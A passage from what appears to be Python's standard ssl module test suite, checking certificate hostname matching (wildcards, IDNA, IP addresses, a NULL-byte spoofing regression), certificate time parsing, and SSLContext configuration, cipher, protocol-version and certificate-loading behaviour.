cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows for levels between 0-5
# with OpenSSL defaulting to 1, however some vendors override the
# default value (e.g. Debian defaults to 2)
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
